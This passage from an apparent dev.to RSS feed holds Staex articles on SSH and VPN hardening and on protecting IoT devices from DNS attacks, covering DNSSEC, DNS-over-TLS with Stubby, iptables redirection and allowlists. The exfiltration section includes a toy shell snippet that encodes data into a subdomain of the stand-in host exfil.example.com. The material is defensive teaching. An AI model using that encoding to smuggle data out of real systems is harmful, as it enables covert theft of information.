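&lt;p&gt;Before making that trade-off you can check whether the device's CPU advertises AES instructions (Linux-specific; on x86 the flag is «aes», and recent ARM cores expose an «aes» feature as well):&lt;/p&gt;

```shell
# Look for the 'aes' CPU flag in /proc/cpuinfo (Linux only).
if grep -qw aes /proc/cpuinfo 2>/dev/null; then
    echo "AES acceleration available"
else
    echo "no AES acceleration"
fi
```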

&lt;p&gt;The alternative is to establish the SSH connection over a VPN. This adds an additional security layer with its own authenticated encryption and trust establishment method. VPNs are not a silver bullet against cyber attacks but a tool to implement &lt;a href="https://en.wikipedia.org/wiki/Defense_in_depth_(computing)"&gt;defense in depth&lt;/a&gt; in your system. Knowing that you have another security layer when some protocol is breached gives you peace of mind and much-needed time to implement proper mitigations.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit this &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-27"&gt;page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>linux</category>
      <category>devops</category>
    </item>
    <item>
      <title>Securing IoT devices from DNS-based attacks</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 19 Dec 2023 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/securing-iot-devices-from-dns-based-attacks-37og</link>
      <guid>https://dev.to/staex/securing-iot-devices-from-dns-based-attacks-37og</guid>
      <description>&lt;p&gt;DNS protocol is one of the attack vectors on your corporate network and IoT devices in particular. Most operating systems access DNS servers using legacy unencrypted protocol by default despite the fact that there are modern secure enhancements for this protocol: DNSSEC, DNS-over-HTTPS, DNS-over-TLS. In this article we discuss these enhancements and explain how to configure them in your network.&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What is DNS?&lt;/li&gt;
&lt;li&gt;Cache poisoning attack&lt;/li&gt;
&lt;li&gt;DNS traffic encryption&lt;/li&gt;
&lt;li&gt;Hard-coded DNS servers&lt;/li&gt;
&lt;li&gt;DNS data exfiltration&lt;/li&gt;
&lt;li&gt;Wrap-up&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What is DNS? &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Domain Name System is a protocol that resolves human-readable names into machine-readable IP addresses and vice versa — the address book of the Internet.&lt;/p&gt;

&lt;p&gt;DNS records are stored on the servers that are organized in a tree. Leaves of the tree are managed by cloud providers, internet providers, and other businesses, whereas roots are managed by an international organization &lt;a href="https://en.wikipedia.org/wiki/Internet_Assigned_Numbers_Authority"&gt;IANA&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;DNS was conceived more than thirty years ago (&lt;a href="https://datatracker.ietf.org/doc/html/rfc1035"&gt;RFC 1035&lt;/a&gt;). As such, it has no encryption or trustworthiness built in. It is easy to spoof a DNS name, to spoof a DNS server address, and to analyze DNS traffic going through your router.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cache poisoning attack &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4kayzj4oacj43xhs730.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4kayzj4oacj43xhs730.jpg" alt="Photo by Florian van Duyn on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This type of attack involves falsifying DNS records on a corrupt DNS server. The falsified records are cached by downstream servers and eventually reach the clients — your IoT devices and servers. Such attacks are commonly called DNS cache poisoning.&lt;/p&gt;

&lt;p&gt;To mitigate this attack IETF introduced a set of security extensions to DNS collectively called DNSSEC (&lt;a href="https://datatracker.ietf.org/doc/html/rfc9364"&gt;RFC 9364&lt;/a&gt;). These extensions need to be enabled both on the client and on the server side.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the server
&lt;/h3&gt;

&lt;p&gt;If DNSSEC is enabled for a particular domain, then there is an RRSIG record for that domain. A DNS client needs to verify the signature from this record and, if the verification fails, return a name resolution failure. The &lt;code&gt;dig&lt;/code&gt; command verifies the DNSSEC record by default; however, it does not fail when there is no such record. Use the following command to resolve a DNS name and print the RRSIG record (the &lt;code&gt;+dnssec&lt;/code&gt; flag).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dig staex.io +dnssec &lt;span class="c"&gt;# should resolve to the ip address&lt;/span&gt;
dig badsign-a.test.dnssec-tools.org +dnssec &lt;span class="c"&gt;# should fail&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usually DNS providers have an option to enable DNSSEC in their portal. Configuring DNSSEC for your own DNS server is out of scope of this article.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the client
&lt;/h3&gt;

&lt;p&gt;To use DNSSEC system-wide you need a capable DNS resolver. One such resolver is &lt;a href="https://dnsprivacy.org/dns_privacy_daemon_-_stubby/"&gt;Stubby&lt;/a&gt;. We will use Stubby in this article because it also supports DNS encryption that we will discuss later.&lt;/p&gt;

&lt;p&gt;To enable DNSSEC in Stubby edit the configuration file (&lt;code&gt;/etc/stubby/stubby.yml&lt;/code&gt; by default), and add/replace the following options.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/stubby/stubby.yml&lt;/span&gt;
&lt;span class="na"&gt;dnssec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GETDNS_EXTENSION_TRUE&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To check that Stubby works, we repeat the dig commands but specify 127.0.0.1 as the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dig staex.io +dnssec @127.0.0.1 &lt;span class="c"&gt;# should resolve to the ip address&lt;/span&gt;
dig badsign-a.test.dnssec-tools.org +dnssec @127.0.0.1 &lt;span class="c"&gt;# should fail&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In all our tests the second address failed to resolve with or without the &lt;code&gt;dnssec&lt;/code&gt; option in the configuration file. We assume that it was filtered on the server side before reaching the client. Better safe than sorry.&lt;/p&gt;

&lt;h2&gt;
  
  
  DNS traffic encryption &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1p6u50mwp4s9rul1z44p.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1p6u50mwp4s9rul1z44p.jpg" alt="Photo by Harmen Jelle van Mourik on Unsplash." width="640" height="877"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;DNS traffic is still unencrypted even if DNSSEC is enabled, and the solution is to use either &lt;a href="https://en.wikipedia.org/wiki/DNS_over_TLS"&gt;DNS-over-TLS&lt;/a&gt; or &lt;a href="https://en.wikipedia.org/wiki/DNS_over_HTTPS"&gt;DNS-over-HTTPS&lt;/a&gt;. DoT and DoH encapsulate the DNS packet in a TLS and HTTPS frame respectively. Both protocols use state-of-the-art authenticated encryption (session keys negotiated via an authenticated public key exchange) and offer protection from replay attacks and &lt;a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack"&gt;man-in-the-middle&lt;/a&gt; attacks during the initial key exchange. Both protocols are used extensively on the Internet and are regularly updated with new ciphers and other cryptographic algorithms.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the server
&lt;/h3&gt;

&lt;p&gt;Both DoH and DoT are supported by popular DNS resolvers like BIND. Configuring these protocols on the server side is out of scope of this article.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the client
&lt;/h3&gt;

&lt;p&gt;To enable DoT on the client side we again use Stubby. This name resolver uses DoT by default. If you want to change the upstream DNS server, then add the following lines to the configuration file (&lt;code&gt;/etc/stubby/stubby.yml&lt;/code&gt; by default).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/stubby/stubby.yml&lt;/span&gt;
&lt;span class="na"&gt;upstream_recursive_servers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address_data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;9.9.9.11&lt;/span&gt;
    &lt;span class="na"&gt;tls_auth_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;dns11.quad9.net"&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address_data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;149.112.112.11&lt;/span&gt;
    &lt;span class="na"&gt;tls_auth_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;dns11.quad9.net"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here we configured Quad9 servers. Alternatives include NextDNS, Cloudflare and Google. Some of them filter malicious sites, which might be useful for browsers but is less important for IoT devices.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hard-coded DNS servers &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gc3cikfoyk31kp557h8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gc3cikfoyk31kp557h8.jpg" alt="Photo by Metin Ozer on Unsplash." width="640" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So far we have configured encryption and signature verification for DNS traffic, and in an ideal world this would be enough to protect your devices. However, some devices use a hard-coded list of DNS servers in their firmware and do not allow changing it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigation
&lt;/h3&gt;

&lt;p&gt;To solve this problem we redirect DNS traffic from those devices to Stubby. The irony is that we exploit the very weakness of legacy DNS: its packets can be easily rewritten and sent to another server without the client noticing.&lt;/p&gt;

&lt;p&gt;Below is a set of &lt;code&gt;iptables&lt;/code&gt; rules that will redirect any incoming traffic on port 53 to the local Stubby server. These rules are for the router.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# network interface that receives DNS packets&lt;/span&gt;
&lt;span class="nv"&gt;interface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;br-lan
&lt;span class="c"&gt;# IP address assigned to the network interface&lt;/span&gt;
&lt;span class="nv"&gt;interface_ip_address&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.1.1
&lt;span class="c"&gt;# local stubby port&lt;/span&gt;
&lt;span class="nv"&gt;stubby_port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53
&lt;span class="k"&gt;for &lt;/span&gt;protocol &lt;span class="k"&gt;in &lt;/span&gt;udp tcp&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nv"&gt;$interface&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nv"&gt;$interface_ip_address&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$protocol&lt;/span&gt; &lt;span class="nt"&gt;--dport&lt;/span&gt; 53 &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-j&lt;/span&gt; DNAT &lt;span class="nt"&gt;--to&lt;/span&gt; &lt;span class="nv"&gt;$interface_ip_address&lt;/span&gt;:&lt;span class="nv"&gt;$stubby_port&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These rules will not work for DoT and DoH, and will not work if the device in question uses a non-standard DNS port. The first problem can be solved by deploying an HTTPS proxy (which might not be desirable) and the second with eBPF rules. Diving into these solutions is worth an article of its own.&lt;/p&gt;

&lt;h2&gt;
  
  
  DNS data exfiltration &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3xqri9sjhv03ptgdf7ix.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3xqri9sjhv03ptgdf7ix.jpg" alt="Photo by Camerauthor Photos on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This data exfiltration technique is rather new but has already been exploited by various malicious programs. To exfiltrate stolen data over DNS queries, an attacker sets up a DNS resolver for a domain they control. On the victim's device the stolen data is encoded into subdomains of this domain: the device resolves those subdomains, and public DNS servers forward the name resolution requests to the attacker's server.&lt;/p&gt;
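&lt;p&gt;The encoding step is trivial, which is what makes the technique attractive. A toy illustration in shell (the domain &lt;code&gt;exfil.example.com&lt;/code&gt; is hypothetical):&lt;/p&gt;

```shell
# Hex-encode the stolen data and smuggle it out as a subdomain.
# A single DNS label is limited to 63 bytes, so real malware
# splits the payload across several queries.
data="secret"
encoded=$(printf '%s' "$data" | od -An -tx1 | tr -d ' \n')
echo "$encoded.exfil.example.com"
```

&lt;p&gt;Resolving the resulting name delivers the bytes of «secret» to whoever runs the authoritative server for that zone.&lt;/p&gt;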

&lt;h2&gt;
  
  
  Mitigation
&lt;/h2&gt;

&lt;p&gt;The problem with this attack is that the traffic goes through perfectly legitimate public DNS servers, and there is no 100% reliable way to detect it on the server side. However, we can easily block the data exfiltration on the client side using a list of allowed DNS names and the allowed IP addresses to which these names resolve. If a program tries to resolve a name that is not in the list, the name resolution fails.&lt;/p&gt;

&lt;p&gt;Below is a set of rules for &lt;code&gt;iptables&lt;/code&gt; that restrict the names that are allowed to be resolved to IP addresses.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# wan interface&lt;/span&gt;
&lt;span class="nv"&gt;interface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eth0
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;$interface&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-p&lt;/span&gt; udp &lt;span class="nt"&gt;--port&lt;/span&gt; 53 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--hex-string&lt;/span&gt; &lt;span class="s2"&gt;"|05|staex|02|io"&lt;/span&gt; &lt;span class="nt"&gt;-algo&lt;/span&gt; bm &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# 05 --- length of "staex" in hexadecimal format&lt;/span&gt;
&lt;span class="c"&gt;# 02 --- length of "io" in hexadecimal format&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
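&lt;p&gt;The length-prefix bytes in the pattern follow the DNS wire format, where every label is preceded by a byte holding its length. A small helper can generate such a pattern for any domain (an illustrative sketch):&lt;/p&gt;

```shell
# Build an iptables hex-string pattern from a domain name:
# each dot-separated label is prefixed with its length as a hex byte.
domain=staex.io
pattern=""
for label in $(printf '%s' "$domain" | tr '.' ' '); do
    pattern="$pattern|$(printf '%02x' ${#label})|$label"
done
echo "$pattern"
```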



&lt;p&gt;Below is a script that generates the set of IP addresses to and from which traffic is allowed. It is a good idea to run this script periodically to pick up DNS record updates. Beware that the DNS servers themselves need to be in the set as well.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cleanup&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt;
&lt;span class="nb"&gt;trap &lt;/span&gt;cleanup EXIT

&lt;span class="c"&gt;# resolve hostnames&lt;/span&gt;
&lt;span class="nv"&gt;allowed_hostnames&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"dns9.quad9.net one.one.one.one"&lt;/span&gt;
&lt;span class="nv"&gt;ip_addresses&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;mktemp&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;&lt;span class="nb"&gt;hostname &lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$allowed_hostnames&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;dig +short &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$hostname&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# create ipset&lt;/span&gt;
&lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;allowlist
ipset &lt;span class="nt"&gt;-exist&lt;/span&gt; create &lt;span class="nv"&gt;$name&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt;:ip
ipset flush &lt;span class="nv"&gt;$name&lt;/span&gt;
&lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; ip_address&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;ipset add &lt;span class="nv"&gt;$name&lt;/span&gt; &lt;span class="nv"&gt;$ip_address&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt; &amp;lt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Below are &lt;code&gt;iptables&lt;/code&gt; rules that restrict the IP addresses allowed for inbound and outbound traffic. For these rules to work you need to disallow all inbound and outbound traffic by default. You might want to use the &lt;a href="https://man7.org/linux/man-pages/man8/iptables-apply.8.html"&gt;iptables-apply&lt;/a&gt; command to avoid locking yourself out of the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;allowlist
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;--match-set&lt;/span&gt; &lt;span class="nv"&gt;$name&lt;/span&gt; src &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;--match-set&lt;/span&gt; &lt;span class="nv"&gt;$name&lt;/span&gt; dst &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These rules might not work for DNS queries that use pointers to encode names. DoT and DoH queries are also problematic. The first problem can be solved using eBPF and the second by using an HTTPS proxy. Again, diving into these solutions is worth an article of its own.&lt;/p&gt;

&lt;p&gt;It is worth noting that data exfiltration is a second-order threat, since an attacker needs to infiltrate the node first to steal the data. Nevertheless, it is important to have multiple layers of security — an approach encouraged by the &lt;a href="https://en.wikipedia.org/wiki/Zero_trust_security_model"&gt;zero-trust security model&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrap-up &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi5fft90twndsc8efji8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi5fft90twndsc8efji8.jpg" alt="Photo by Luismi Sánchez on Unsplash." width="640" height="475"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The DNS protocol is not secure by default, and you need to protect your devices from common attacks yourself. Implementing full protection is a huge endeavor that is best done by professionals. However, implementing "good enough" protection is manageable and can be done using the techniques from this article.&lt;/p&gt;

&lt;p&gt;Signature verification via DNSSEC and traffic encryption via DoT or DoH are a must for any serious IoT project, whereas hard-coded DNS servers and DNS data exfiltration are mostly second-order threats.&lt;/p&gt;

&lt;p&gt;Future versions of Staex will include all the mitigations mentioned in this article, thus making your IoT network secure by default. &lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to be the first to know about the new features.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally posted on &lt;a href="https://staex.io/blog/secure-your-network-and-iot-devices-from-dns-based-attacks?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-19"&gt;staex.io&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect them from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-19"&gt;this page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>devops</category>
      <category>security</category>
    </item>
  </channel>
</rss>
